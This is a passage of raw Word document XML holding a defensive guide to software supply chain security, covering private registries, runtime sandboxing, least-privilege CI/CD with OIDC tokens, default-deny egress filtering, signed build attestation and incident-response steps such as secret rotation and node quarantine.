        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>@mycompany/auth-library</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263692E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure local package managers ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>npmrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>pip.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to pull these specific scopes exclusively from an internal, authenticated private artifact registry (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sonatype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nexus or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>JFrog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Artifactory), structurally preventing the package manager from wandering out to public registries to look for internal code names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6EEB8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Programmatic Runtime Component Sandboxing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0B6A0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>If an application must execute a dynamic third-party library whose complete code history cannot be manually audited, developers should run that execution thread within a restricted subsystem or micro-sandbox. For example, in modern Node.js environments, use built-in permission flags to restrict what the runtime can access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AF14A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># Execute the runtime with explicit restrictions on file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52778391" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00E747AE" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E747AE">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system write operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF29CA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Architecture &amp; Design Principles (Defense-in-Depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F31B99"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Because a supply chain breach means an attacker's code is already running inside your perimeter, the architectural design must center on containment—ensuring that a compromised package cannot pivot to dominate the wider infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1976A808" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Principle of Least Privilege at the CI/CD Runner Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78190083" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deconstruct complex, all-powerful deployment pipelines into highly segmented, isolated build phases. A runner responsible for compiling or linting code should exist in an ephemeral environment with zero network routing to production systems and absolutely no access to deployment secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723597F9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud access credentials should never be saved as static environmental strings inside a pipeline configuration. Instead, architect pipelines to use </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OpenID Connect (OIDC)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to dynamically request short-lived, single-use identity tokens from the cloud provider, tightly scoped to that exact micro-action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D142B5D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Zero-Trust Network Outbound Filtering (Egress Control):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D044A8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The primary goal of supply chain malware (such as the Shai-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hulud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> worm) is to exfiltrate collected data back to an attacker-controlled Command and Control (C2) server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6D1E0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Architect production servers and container clusters with a strict </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Default-Deny Egress Firewall Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Production environments should be completely blocked from initiating arbitrary outbound internet connections. If a microservice requires connection to a legitimate third-party API gateway, it must pass through an explicit outbound proxy whitelist that inspects and filters anomalous domain requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E46FC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Immutable Build Artifacts &amp; Cryptographic Attestation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5E565" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Build systems must follow a strict "Build Once, Deploy Many" lifecycle. An application artifact should be compiled once in a secure environment, signed cryptographically, and pushed to a locked container registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE4834" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Software Supply Chain Attestations</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sigstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>/Cosign). During subsequent deployments to staging or production, the orchestration environment (e.g., Kubernetes admission controllers) must validate the artifact's digital signature and provenance path. If the container image lacks a verified signature proving it was generated cleanly by the official CI/CD pipeline, the cluster automatically drops the deployment, blocking unauthorized code injections structurally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D24DE1E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Incident Response &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69D59A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Immediate Containment (Stopping the Bleeding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29345155"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When an upstream library or build pipeline component is actively exploited in production, traditional containment tactics are often challenged because the malicious code executes from within. Immediate response actions must prioritize isolation and access termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721024B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement Aggressive Outbound Egress Blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the supply chain malware is actively attempting to exfiltrate database records or environment secrets, immediately update firewalls, network security groups, or service mesh configurations to drop all outbound traffic to non-whitelisted public IP addresses. This effectively blinds the attacker's Command and Control (C2) servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861DDF9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Freeze the CI/CD Pipelines and Registry Feeds:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instantly pause all automated build jobs, deployment runners, and package syncing routines. Disconnect local artifact repositories (e.g., Nexus, Artifactory) from public mirrors (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PyPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) to prevent the automated ingestion of further poisoned package versions or transitive dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D746B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Revoke and Cycle Inherited Secrets Globally:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supply chain attacks frequently target developer keys, cloud IAM tokens, and repository publishing access. Revoke all API keys, code-signing certificates, database passwords, and cloud credentials that were accessible to the compromised pipeline runner or developer workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B81A57" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Isolate and Quarantine Compromised Nodes:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify the specific application containers, virtual machines, or developer endpoints executing the malicious package. Sever their network connections immediately to prevent the threat from moving laterally across internal networks or self-propagating via shared tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD763E8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Remediation &amp; Patching (The Permanent Fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25208F21"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Fixing a supply chain failure requires completely purging the compromised software footprints and establishing strict operational checkpoints to guarantee code origin and integrity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1FA247" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
